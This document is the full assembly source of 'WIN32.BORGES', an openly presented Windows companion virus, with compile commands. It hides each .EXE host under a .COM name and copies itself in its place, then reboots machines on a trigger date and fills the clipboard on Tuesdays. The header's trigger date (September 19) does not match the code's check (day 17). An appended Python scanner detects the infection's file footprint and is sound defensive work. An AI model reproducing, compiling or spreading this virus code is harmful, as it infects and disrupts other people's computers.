; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
; It mirrors EXE files, navigates directories with the famous dot-dot  ;
; method, on September 19 reboots the machine; on Tuesdays puts a text ;
; in the clipboard. This beast works using API for all its operations, ;
; no dirty tricks are used. Just to maintain compatibility :)          ;
; Dedicated to Jorge Luis Borges, because the first tale of his book   ;
; named "The book of sand" is called "The other", and it speaks about  ;
; an encounter with a younger copy of himself. The famous doppelganger.;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
;
;
; COMPILATION:
;
; tasm32 /ml /m3 borges.asm,,
;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib
;
;

.386
.model flat
locals

extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC

.DATA

TituloVentana   db 'WIN32.BORGES VIRUS by Int13h/IKX',0
TextoVentana    db 'Made in Paraguay, South America',0
MemHandle       dd 0
Victimas        db '*.EXE',0
SearcHandle     dd 0
Longitud        dd 0
ProcessInfo     dd 4 dup (0)
StartupInfo     dd 4 dup (0)
Win32FindData   dd 0,0,0,0,0,0,0,0,0,0,0
Hallado         db 200 dup (0)
Crear           db 200 dup (0)
ParaCorrer      db 200 dup (0)
Original        db 200 dup (0)
Actual          db 200 dup (0)
PuntoPunto      db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0

.CODE

BORGES:
        mov     eax,offset SystemTimeStruc
        push    eax
        call    GetSystemTime
        mov     ax,word ptr offset [SystemTimeStruc+2]
        cmp     al,9
        jne     NoFQVbirthday
        mov     ax,word ptr offset [SystemTimeStruc+6]
        cmp     al,17
        je      Adios

NoFQVbirthday:
        push    offset Original
        push    000000C8h
        call    GetCurrentDirectoryA
        mov     dword ptr [Longitud],eax
        call    GetCommandLineA
        push    eax
        push    offset ParaCorrer
        call    lstrcpyA
        mov     edi,eax

Buscar:
        cmp     byte ptr [edi],'.'
        jz      ElPunto
        inc     edi
        jmp     Buscar

ElPunto:
        mov     esi,edi
        inc     esi
        add     edi,4
        mov     byte ptr [edi],00

Carrousell:
        call    InfectDirectory
        push    offset PuntoPunto
        call    SetCurrentDirectoryA
        push    offset Actual
        push    000000C8h
        call    GetCurrentDirectoryA
        cmp     eax,dword ptr [Longitud]
        je      Salida
        mov     dword ptr [Longitud],eax
        jmp     Carrousell

InfectDirectory:
        push    offset Win32FindData
        push    offset Victimas
        call    FindFirstFileA
        mov     dword ptr [SearcHandle],eax

Ciclo:
        cmp     eax,-1
        je      Salida
        or      eax,eax
        jnz     Continuar
        ret

Continuar:
        push    offset Hallado
        push    offset Crear
        call    lstrcpyA
        mov     edi,offset Crear

SeguirBuscando:
        cmp     byte ptr [edi],'.'
        jz      PuntoEncontrado
        inc     edi
        jmp     SeguirBuscando

PuntoEncontrado:
        inc     edi
        mov     dword ptr [edi],0004d4f43h
        push    offset Crear
        push    offset Hallado
        call    MoveFileA
        push    0
        push    offset Hallado
        push    offset ParaCorrer+1
        call    CopyFileA
        push    offset Win32FindData
        push    dword ptr [SearcHandle]
        call    FindNextFileA
        jmp     Ciclo

FillClipboard:
        push    0
        call    OpenClipboard
        call    EmptyClipboard
        push    (offset TextoVentana-offset TituloVentana)
        push    00000002                ; GMEM_MOVEABLE
        call    GlobalAlloc
        push    eax
        mov     dword ptr [MemHandle],eax
        call    GlobalLock
        push    eax
        push    offset TituloVentana
        push    eax
        call    lstrcpyA
        call    GlobalUnlock
        push    dword ptr [MemHandle]
        push    00000001                ; CF_TEXT
        call    SetClipboardData
        call    CloseClipboard
        jmp     Run4theNight

Adios:
        push    00000001
        push    offset TituloVentana
        push    offset TextoVentana
        push    0
        call    MessageBoxA
        push    0
        push    00000002                ; EWX_REBOOT
        call    ExitWindowsEx

Salida:
        push    offset Original
        call    SetCurrentDirectoryA
        mov     ax,word ptr offset [SystemTimeStruc+4]
        cmp     al,2
        je      FillClipboard

Run4theNight:
        push    offset ProcessInfo
        push    offset StartupInfo
        sub     eax,eax
        push    eax
        push    eax
        push    00000010h
        push    eax
        push    eax
        push    eax
        call    GetCommandLineA
        inc     eax
        push    eax

Done:
        mov     dword ptr [esi],0004d4f43h
        push    offset ParaCorrer+1
        call    CreateProcessA
        push    0
        call    ExitProcess

Ends
End BORGES
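From the defensive side, as an added example that is not part of the original listing: a small Python scanner for the on-disk footprint this companion technique leaves. Every infected NAME.EXE is a byte-identical copy of the virus body, and the displaced host survives beside it as NAME.COM while still carrying its MZ header, which a genuine DOS .COM never has. The infected directory tree it scans is constructed inline with fake file contents.

```python
import hashlib
import os
import tempfile
from collections import Counter, defaultdict

# Constructed sample data: one fake "virus body" and two fake host programs.
VIRUS_BODY = b"MZ\x90\x00PE\x00\x00fake borges body"
HOST_A = b"MZ\x90\x00PE\x00\x00real program A"
HOST_B = b"MZ\x90\x00PE\x00\x00real program B"
def build_sample_tree():
    """Throw-away tree mimicking an infected layout: the virus body copied over
    each .EXE, the displaced host left beside it under the .COM name."""
    base = tempfile.mkdtemp(prefix="borges_demo_")
    layout = {"tools/app.exe": VIRUS_BODY, "tools/app.com": HOST_A,
              "tools/util.exe": VIRUS_BODY, "tools/util.com": HOST_B,
              "other/clean.exe": HOST_B,        # no .COM twin: not a pair
              "other/note.txt": b"not executable"}
    for rel, data in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return base
def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def find_companion_pairs(root):
    """Report every NAME.EXE with a NAME.COM beside it; a .COM that starts with
    'MZ' is a renamed Windows executable, i.e. the displaced host program."""
    findings = []
    for dirpath, _, names in os.walk(root):
        by_stem = defaultdict(dict)
        for name in names:
            stem, ext = os.path.splitext(name.lower())
            if ext in (".exe", ".com"):
                by_stem[stem][ext] = os.path.join(dirpath, name)
        for stem, exts in sorted(by_stem.items()):
            if ".exe" in exts and ".com" in exts:
                with open(exts[".com"], "rb") as f:
                    com_is_pe = f.read(2) == b"MZ"
                findings.append({"dir": dirpath, "stem": stem, "com_is_pe": com_is_pe,
                                 "exe_sha256": sha256_file(exts[".exe"])})
    return findings
def shared_exe_hash(findings):
    """One body is copied over every .EXE, so a repeated digest is the second indicator."""
    counts = Counter(f["exe_sha256"] for f in findings)
    digest, n = counts.most_common(1)[0] if counts else (None, 0)
    return digest if n >= 2 else None
```

Both indicators together (PE-headed .COM twins plus one digest shared by all the .EXE halves) are far stronger than either alone, since legitimate software occasionally ships an .EXE and a .COM of the same name.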